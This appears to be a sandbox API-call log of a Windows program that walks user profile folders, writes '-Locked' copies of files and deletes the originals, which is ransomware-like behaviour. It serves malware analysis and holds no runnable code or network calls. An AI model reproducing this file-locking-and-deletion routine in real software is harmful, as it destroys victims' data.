[0304.149] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af0f4) returned 1 [0304.149] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Camera Roll" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\camera roll"), fInfoLevelId=0x0, lpFileInformation=0x1af174 | out: lpFileInformation=0x1af174*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2b0e752d, ftCreationTime.dwHighDateTime=0x1d70504, ftLastAccessTime.dwLowDateTime=0x35af0875, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x35af0875, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0304.149] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0f0) returned 1 [0304.150] RemoveDirectoryW (lpPathName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Camera Roll" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\camera roll")) returned 0 [0304.152] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\PrintHood\\.", nBufferLength=0x105, lpBuffer=0x1aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\PrintHood", lpFilePart=0x0) returned 0x1f [0304.152] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af164) returned 1 [0304.152] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\PrintHood", nBufferLength=0x105, lpBuffer=0x1aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\PrintHood", lpFilePart=0x0) returned 0x1f [0304.152] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\PrintHood\\", nBufferLength=0x105, lpBuffer=0x1aec40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\PrintHood\\", lpFilePart=0x0) returned 0x20 [0304.152] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\PrintHood\\*", lpFindFileData=0x1aee8c | out: lpFindFileData=0x1aee8c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0304.153] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af128) returned 1 [0304.155] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Recent\\.", nBufferLength=0x105, lpBuffer=0x1aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Recent", lpFilePart=0x0) returned 0x1c [0304.155] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af164) returned 1 [0304.155] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Recent", nBufferLength=0x105, lpBuffer=0x1aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Recent", lpFilePart=0x0) returned 0x1c [0304.155] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Recent\\", nBufferLength=0x105, lpBuffer=0x1aec40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Recent\\", lpFilePart=0x0) returned 0x1d [0304.156] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Recent\\*", lpFindFileData=0x1aee8c | out: lpFindFileData=0x1aee8c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0304.156] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af128) returned 1 [0304.159] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Saved Games\\.", nBufferLength=0x105, lpBuffer=0x1aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Saved Games", lpFilePart=0x0) returned 0x21 [0304.159] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af164) returned 1 [0304.159] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Saved Games", nBufferLength=0x105, lpBuffer=0x1aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Saved Games", lpFilePart=0x0) returned 0x21 [0304.159] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Saved Games\\", nBufferLength=0x105, lpBuffer=0x1aec40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Saved Games\\", lpFilePart=0x0) returned 0x22 [0304.160] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Saved Games\\*", lpFindFileData=0x1aee8c | out: lpFindFileData=0x1aee8c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x43754b80, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x43754b80, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0304.160] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x43754b80, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x43754b80, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0304.160] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x43754b80, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x43754b80, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x43754b80, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0304.160] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0304.161] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0304.161] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af124) returned 1 [0304.161] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af130) returned 1 [0304.161] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af164) returned 1 [0304.161] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Saved Games", nBufferLength=0x105, lpBuffer=0x1aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Saved Games", lpFilePart=0x0) returned 0x21 [0304.161] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Saved Games\\", nBufferLength=0x105, lpBuffer=0x1aec40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Saved Games\\", lpFilePart=0x0) returned 0x22 [0304.161] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Saved Games\\*", lpFindFileData=0x1aee8c | out: lpFindFileData=0x1aee8c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x43754b80, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x43754b80, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0304.162] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x43754b80, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x43754b80, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0304.162] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x43754b80, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x43754b80, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x43754b80, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0304.162] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x43754b80, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x43754b80, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x43754b80, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0304.163] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0304.163] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af124) returned 1 [0304.163] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af130) returned 1 [0304.163] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Saved Games\\desktop.ini-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Saved Games\\desktop.ini-Locked", lpFilePart=0x0) returned 0x34 [0304.163] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0304.163] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Saved Games\\desktop.ini-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\saved games\\desktop.ini-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0304.164] GetFileType (hFile=0x49c) returned 0x1 [0304.164] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0304.164] GetFileType (hFile=0x49c) returned 0x1 [0304.166] CloseHandle (hObject=0x49c) returned 1 [0304.167] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Saved Games\\desktop.ini", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Saved Games\\desktop.ini", lpFilePart=0x0) returned 0x2d [0304.192] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Saved Games\\desktop.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\saved games\\desktop.ini")) returned 1 [0304.194] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Searches\\.", nBufferLength=0x105, lpBuffer=0x1aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Searches", lpFilePart=0x0) returned 0x1e [0304.194] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af164) returned 1 [0304.194] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Searches", nBufferLength=0x105, lpBuffer=0x1aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Searches", lpFilePart=0x0) returned 0x1e [0304.194] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Searches\\", nBufferLength=0x105, lpBuffer=0x1aec40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Searches\\", lpFilePart=0x0) returned 0x1f [0304.194] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Searches\\*", lpFindFileData=0x1aee8c | out: lpFindFileData=0x1aee8c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x43695fb2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x437a1142, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x437a1142, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0304.195] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x43695fb2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x437a1142, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x437a1142, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0304.195] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x436bc315, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x436bc315, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x437a1142, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x20c, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0304.196] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x437a1142, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x437a1142, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x437a1142, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Everywhere.search-ms", cAlternateFileName="EVERYW~1.SEA")) returned 1 [0304.196] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x4377acca, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4377acca, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x4377acca, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 1 [0304.196] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0304.196] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0304.196] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af124) returned 1 [0304.197] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af130) returned 1 [0304.197] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af164) returned 1 [0304.197] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Searches", nBufferLength=0x105, lpBuffer=0x1aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Searches", lpFilePart=0x0) returned 0x1e [0304.197] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Searches\\", nBufferLength=0x105, lpBuffer=0x1aec40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Searches\\", lpFilePart=0x0) returned 0x1f [0304.197] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Searches\\*", lpFindFileData=0x1aee8c | out: lpFindFileData=0x1aee8c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x43695fb2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x437a1142, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x437a1142, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0304.197] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x43695fb2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x437a1142, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x437a1142, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0304.198] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x436bc315, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x436bc315, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x437a1142, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x20c, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0304.198] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x437a1142, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x437a1142, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x437a1142, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Everywhere.search-ms", cAlternateFileName="EVERYW~1.SEA")) returned 1 [0304.198] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x4377acca, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4377acca, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x4377acca, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 1 [0304.198] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x4377acca, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4377acca, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x4377acca, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0 [0304.198] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0304.199] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af124) returned 1 [0304.199] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af130) returned 1 [0304.199] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Searches\\desktop.ini-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Searches\\desktop.ini-Locked", lpFilePart=0x0) returned 0x31 [0304.199] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0304.199] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Searches\\desktop.ini-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\searches\\desktop.ini-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0304.201] GetFileType (hFile=0x49c) returned 0x1 [0304.201] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0304.201] GetFileType (hFile=0x49c) returned 0x1 [0304.204] CloseHandle (hObject=0x49c) returned 1 [0304.204] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Searches\\desktop.ini", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Searches\\desktop.ini", lpFilePart=0x0) returned 0x2a [0304.204] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Searches\\desktop.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\searches\\desktop.ini")) returned 1 [0304.205] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Searches\\Everywhere.search-ms-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Searches\\Everywhere.search-ms-Locked", lpFilePart=0x0) returned 0x3a [0304.205] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0304.205] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Searches\\Everywhere.search-ms-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\searches\\everywhere.search-ms-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0304.206] GetFileType (hFile=0x49c) returned 0x1 [0304.206] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0304.206] GetFileType (hFile=0x49c) returned 0x1 [0304.208] CloseHandle (hObject=0x49c) returned 1 [0304.208] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Searches\\Everywhere.search-ms", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Searches\\Everywhere.search-ms", lpFilePart=0x0) returned 0x33 [0304.208] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Searches\\Everywhere.search-ms" (normalized: "c:\\users\\rdhj0cnfevzx\\searches\\everywhere.search-ms")) returned 0 [0304.211] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\SendTo\\.", nBufferLength=0x105, lpBuffer=0x1aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\SendTo", lpFilePart=0x0) returned 0x1c [0304.211] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af164) returned 1 [0304.211] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\SendTo", nBufferLength=0x105, lpBuffer=0x1aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\SendTo", lpFilePart=0x0) returned 0x1c [0304.211] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\SendTo\\", nBufferLength=0x105, lpBuffer=0x1aec40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\SendTo\\", lpFilePart=0x0) returned 0x1d [0304.211] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\SendTo\\*", lpFindFileData=0x1aee8c | out: lpFindFileData=0x1aee8c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0304.212] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af128) returned 1 [0304.214] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Start Menu\\.", nBufferLength=0x105, lpBuffer=0x1aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Start Menu", lpFilePart=0x0) returned 0x20 [0304.214] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af164) returned 1 [0304.214] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Start Menu", nBufferLength=0x105, lpBuffer=0x1aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Start Menu", lpFilePart=0x0) returned 0x20 [0304.214] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Start Menu\\", nBufferLength=0x105, lpBuffer=0x1aec40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Start Menu\\", lpFilePart=0x0) returned 0x21 [0304.214] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Start Menu\\*", lpFindFileData=0x1aee8c | out: lpFindFileData=0x1aee8c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0304.215] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af128) returned 1 [0304.217] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Templates\\.", nBufferLength=0x105, lpBuffer=0x1aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Templates", lpFilePart=0x0) returned 0x1f [0304.217] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af164) returned 1 [0304.217] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Templates", nBufferLength=0x105, lpBuffer=0x1aec6c, lpFilePart=0x0 | out: 